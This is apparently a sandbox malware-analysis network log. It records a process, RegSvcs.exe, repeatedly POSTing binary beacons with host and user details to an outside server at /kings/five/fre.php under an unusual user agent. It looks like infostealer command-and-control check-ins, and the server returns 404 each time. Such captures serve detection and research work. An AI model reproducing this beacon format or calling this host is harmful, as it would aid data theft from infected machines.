Dec 4, 2024 06:53:18.586366892 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:18 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49834	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:18.845488071 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:18.965517998 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:20.454266071 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:20 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49841	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:20.721347094 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:20.841367006 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:22.119246960 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49845	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:22.373765945 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:22.493731976 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:23.990828991 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49850	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:24.249197006 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:24.369184971 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:25.847604990 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:25 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49855	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:26.109890938 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:26.229897976 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:27.716058969 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:27 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49861	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:27.989603996 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:28.109935999 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:29.409584045 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:29 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49866	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:29.684309006 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:29.804558992 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:31.273389101 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:31 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49871	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:31.536389112 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:31.659621954 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:33.162556887 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:32 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49875	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:33.423110962 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:33.543134928 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:35.092927933 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:34 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49881	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:35.600054026 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:35.720159054 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:37.030312061 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:36 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49886	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:37.297369957 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:37.417337894 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:38.846515894 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:38 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49891	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:39.110398054 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:39.230432987 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:40.713646889 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:40 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49896	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:40.970338106 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:41.090316057 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:42.517138004 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:42 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49902	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:42.813740015 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:42.933722019 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:44.404247999 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49906	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:44.672182083 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:44.792351961 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:46.309767008 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49912	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:46.585800886 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:46.706490040 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:48.190813065 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:47 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49916	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:48.450506926 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:48.570672989 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:50.049144030 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49920	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:50.313322067 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:50.433425903 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:51.907574892 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:51 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49925	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:52.171034098 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:52.290981054 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:53.783016920 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:53 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49930	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:54.043678045 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:54.163772106 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:55.529705048 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:55 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49936	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:55.802531004 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:55.922616959 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
